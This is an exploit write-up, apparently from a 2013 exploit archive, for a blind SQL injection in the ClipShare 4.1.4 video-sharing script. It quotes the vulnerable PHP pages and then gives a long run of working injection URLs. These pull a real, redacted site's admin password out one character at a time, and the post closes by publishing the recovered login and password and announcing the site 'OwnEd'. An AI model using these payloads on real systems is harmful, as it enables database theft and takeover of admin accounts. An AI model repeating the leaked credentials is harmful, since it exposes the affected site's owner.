===================================================================== Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4 Official site: http://www.clip-share.com Software License: Commercial. Vulns: Blind SQl injection && Plaintext Password. ====================================================================== AFAIK all versions is vulnerable: Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273 Last Checked: 13 March 2013 NOTE:To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini) Vulnerable Script: //ugroup_videos.php =========================== BEGIN OF ugroup_videos.php ============================================= <?php /************************************************************************************************** | Software Name : ClipShare - Video Sharing Community Script | Software Author : Clip-Share.Com / ScriptXperts.Com | Website : http://www.clip-share.com | E-mail : office@clip-share.com |************************************************************************************************** | This source file is subject to the ClipShare End-User License Agreement, available online at: | http://www.clip-share.com/video-sharing-script-eula.html | By using this software, you acknowledge having read this Agreement and agree to be bound thereby. |************************************************************************************************** | Copyright (c) 2006-2007 Clip-Share.com. All rights reserved. |**************************************************************************************************/ require('include/config.php'); require('include/function.php'); $urlkey = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL; $uid = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL; $sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1"; $rs = $conn->Execute($sql); if($rs->recordcount()>0) { STemplate::assign('groupname',$rs->fields[gname]); //PAGING STARTS $page = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL; $sql = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1"; $ars = $conn->Execute($sql); $total = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini']; $tpage = ceil($total/$config['items_per_page']); $spage = ( $tpage == 0 ) ? $tpage+1 : $tpage; $startfrom = ($page-1)*$config['items_per_page']; $sql = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page']; $rs = $conn->execute($sql); if($rs->recordcount()>0) $vdo = $rs->getrows(); $start_num = $startfrom+1; $end_num = $startfrom+$rs->recordcount(); $page_link = ''; $type = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL; for ( $k=1;$k<=$tpage;$k++ ) $page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a> "; //END PAGING } STemplate::assign('err',$err); STemplate::assign('msg',$msg); STemplate::assign('page',$page); STemplate::assign('start_num',$start_num); STemplate::assign('end_num',$end_num); STemplate::assign('page_link',$page_link); STemplate::assign('total',$total); STemplate::assign('answers',$vdo); STemplate::assign('head_bottom',"grouplinks.tpl"); STemplate::display('head1.tpl'); STemplate::display('err_msg.tpl'); STemplate::display('ugroup_members.tpl'); STemplate::display('footer.tpl'); STemplate::gzip_encode(); ?> ====================END OF ugroup_videos.php======================== Real exploitation example: _REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3 //ON TRUE //RETURNS: NORMAL PAGE http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3 //ON FALSE // RETURNS NOTHING.(White Page) http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3 Plaintext password: //siteadmin/login.php ============ BEGIN OF siteadmin/login.php =========================== <?php include('../include/config.php'); if ( isset($_POST['submit_login']) ) { $username = trim($_POST['username']); $password = trim($_POST['password']); if ( $username == '' or $password == '' ) { $err = 'Please provide a username and password!'; } else { $access = false; $sql = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'"; $conn->execute($sql); if ( $conn->Affected_Rows() == 1 ) { $sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'"; $conn->execute($sql); if ( $conn->Affected_Rows() == 1 ) { $access = true; } } // SNIP // ============ END OF siteadmin/login.php =========================== //TRUE http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3 80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3 Passi cekirik: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 11 simvolludur pass. ======================================================== 1-ci simvol: o http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 2-ci simvol: ( http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 3-cu simvol: 2 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 4-cu simvol: n http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 5-ci simvol: @ http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 6-ci simvol: b http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 7-ci simvol: % (yoxla sonra) http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 8-ci simvol: h http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 9-cu simvol: a http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 10-cu simvol: 5 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== 11-ci simvol: 1 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 ======================================================== http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 //Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur.(plaintext oldugundan subhe yaradirdi) http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3 pass: o(2n@b%ha51 http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3 login: admin pass: o(2n@b%ha51 http://_REMOVED_/siteadmin/ OwnEd. Tested version: Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout Copyright © 2006-2008 ClipShare. All rights reserved. ========================================= KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us El sallayin :D ottoman38 & Ferid23 & Metaizm &HERO_AZE & BOT_25 &CAMOUFL4G3 4R!F * Orxan_204 & & SEXAVET & Manifesto & J_OF_R & & etc. =========================================== /AkaStepБрой прочитания на тази страница: 947
ClipShare 4.1.4 – Multiple Vulnerabilities